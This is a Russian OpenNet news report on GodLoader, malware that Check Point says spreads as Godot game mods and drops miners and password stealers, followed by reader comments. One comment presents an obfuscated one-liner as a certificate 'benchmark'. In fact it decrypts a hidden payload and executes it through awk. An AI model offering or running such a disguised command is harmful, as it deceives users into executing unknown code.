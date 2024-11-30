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Обнаружено вредоносное ПО, использующее игровой движок Godot как платформу для запуска

30.11.2024 22:53

Компания Checkpoint сообщила о выявлении вредоносного ПО GodLoader, написанного на языке GDScript и использующего открытый игровой движок Godot для своего выполнения (движок Godot применяется как платформа для запуска). Написание кода на GDScript позволило распространять вредоносные программы среди любителей компьютерных игр под видом модов к играм и игровых ресурсов в формате pck, обрабатываемых движком Godot. Использование GDScript также дало возможность не зависеть от операционной системы, которая установлена у пользователя (Windows, macOS, Linux, Android и iOS).

Так как для выполнения программ на GDScript требуется наличие движка Godot, основной целью атаки были пользователи игр на данном движке. Самые ранние варианты нового вредоносного ПО датированы 29 июня. Всего зафиксировано более 17 тысяч систем поражённых GodLoader. Как правило жертвы атаки загружали со сторонних ресурсов и подставных репозиториев на GitHub непроверенные pck-архивы c интегрированным GodLoader. После выполнения размещённого в архиве скрипта на языке GDScript, GodLoader осуществлял загрузку и запуск дополнительных вредоносных компонентов, совершающих такие действия как майнинг криптовалюты и отправку с системы пользователя сохранённых паролей и ключей доступа.



  1. Главная ссылка к новости (https://research.checkpoint.co...)
  2. OpenNews: Проект GodotOS подготовил оболочку операционной системы на игровом движке Godot
  3. OpenNews: Выпуск открытого игрового движка Godot 4.3
  4. OpenNews: Библиотека LibGodot для встраивания в приложения сцен, созданных для игрового движка Godot
  5. OpenNews: Распространение вредоносного ПО через рекламу домена, неотличимого от домена проекта KeePass
  6. OpenNews: Смена владельца библиотеки Polyfill привела к подстановке вредоносного кода на 110 тысяч сайтов
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/62323-godloader
Ключевые слова: godloader, godot
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (7) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.2, Аноним (2), 23:12, 30/11/2024 [ответить]  
    		• +/
    Ох уж эти злые дядьки из Checkpoint, всю малину портят. Сидели бы молча. И вообще, как они не распустились после того как натворили дел в виндой.
     
  • 1.3, Bottle (?), 23:33, 30/11/2024 [ответить]  
    		• +1 +/
    Это самое полезное, что произвёл на свет Godot - потому что кроме вирусни он породил не менее фанатичное сообщество, сравнивающее свою тормозную поделку с Блендером уже на протяжении десятка лет.
     
     
  • 2.5, Dzen Python (ok), 23:40, 30/11/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    А как же змейка?
     
     
  • 3.8, Bottle (?), 00:56, 01/12/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Статтеры присутствуют. Я лично испытывал "заикания" в демках, которые выдают 90 FPS и выше. Только недавно начали править frame pacing, и то, это не первый pull request в попытке исправить проблему.
    https://github.com/godotengine/godot/pull/99833
     

  • 1.4, Dzen Python (ok), 23:36, 30/11/2024 [ответить]  
    		• +1 +/
    Я щас расскажу дядям из Checkpoint про js-майнеры, так они вообще наверное, аж пеной изойдут. Или про вредоносы на lua... Тайпсквотнутые клоны пакетов со вставками для питона в pip... Или любимые виндунами однострочники на Мощщщной Раковине...
     
     
  • 2.7, Аноним (7), 23:57, 30/11/2024 Скрыто ботом-модератором     [к модератору]
    		• +/
     
  • 2.9, Аноним (9), 01:32, 01/12/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    > Или любимые виндунами однострочники на Мощщщной Раковине...

    Эти "однострочники" в 4K экран 4px шрифтом хоть помещаются? 😲

    А вот, кстати, однострочный (влазит в экран ноута) э-э-э, бенчмарк валидации серта опеннета:
    [CODE]
    time echo "U2FsdGVkX1856bpfItIkP2IgSTHMlQT/njNhocA8+gcuSaNCQ78lIr29hCDwKSns\nmarNmtq4gEG0hv6kd8CihCSQqGHmptqXZg9XtNQcBj8="|openssl aes-256-cbc -d -a -k opennet.ru |xargs -0I% awk '%'
    [/CODE]

     

  • 1.6, Аноним (6), 23:41, 30/11/2024 [ответить]  
    		• +1 +/
    О, в очередной вредоносов пользователи налили сами себе. Ждем следующим шагом слабо рецензируемый Comprehensive Godot Archive Network, в который централизованно будут лить вредоносов под видом минифорков с тайпсквоттинговыми  названием. Сколько уже можно ходить по одному и тому же кругу.
     

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